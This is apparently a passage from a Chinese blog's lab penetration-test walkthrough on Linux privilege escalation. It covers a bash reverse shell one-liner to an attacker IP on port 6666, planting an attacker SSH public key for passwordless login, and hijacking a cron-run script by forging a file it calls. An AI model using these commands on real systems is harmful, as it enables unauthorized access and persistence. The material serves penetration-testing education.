主页 > 网络知识 > 记一次渗透后运用多种方式提权实战(3)

记一次渗透后运用多种方式提权实战(3)

 

记一次渗透后运用多种方式提权实战

 

然后在键盘上按住ctrl+r,

 

记一次渗透后运用多种方式提权实战

 

接着再按住ctrl+x;

 

记一次渗透后运用多种方式提权实战

 

现在就可以输入命令了;

 

记一次渗透后运用多种方式提权实战

完成了提权;

 

因为看着不方便,所以可以用bash重新反弹个通道;

echo "bash -i >& /dev/tcp/192.168.0.3/6666 0>&1" | bash

 

记一次渗透后运用多种方式提权实战

还可以用高端一点的方法,ssh免密登录。

 

ssh免密登录

kali下生成自己的公钥,口令为空;

 

记一次渗透后运用多种方式提权实战

 

靶机上创建 .ssh文件夹;

 

记一次渗透后运用多种方式提权实战

 

靶机上把kali的公钥放到认证文件里;

 

记一次渗透后运用多种方式提权实战

 

ssh免密登录;

 

记一次渗透后运用多种方式提权实战

接下来进行下一步提权。

 

七、进程提权 1、修改源文件提权

 

记一次渗透后运用多种方式提权实战

sudo因为没有密码,所以无法查看,suid没发现明显的线索,之前sudo -l和suid两种提权方式都试过了,这里应该考察其他方式了;

 

也没有考到计划任务提权;

 

记一次渗透后运用多种方式提权实战

运行下脚本pspy64试试;

 

 

记一次渗透后运用多种方式提权实战

发现线索,uid=1003 就是pedro用户;

记一次渗透后运用多种方式提权实战

 

既然Reporting_System_Info.sh定期运行,于是想到如果能修改该程序的内容,那就可以获得shell。

 

记一次渗透后运用多种方式提权实战

 

图中后面的+号表示 Linux ACL访问控制权限,类似于 Windows 系统中分配权限的方式,单独指定用户并单独分配权限,这样就解决了用户身份不足的问题。

 

记一次渗透后运用多种方式提权实战

可以看到我们不能直接修改Reporting_System_Info.sh,但是根据源码,程序要运行Send_Reporting_Email.sh,我们可以伪造/home/maria/Send_Reporting_Email.sh这个文件,也同样会执行;

 

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!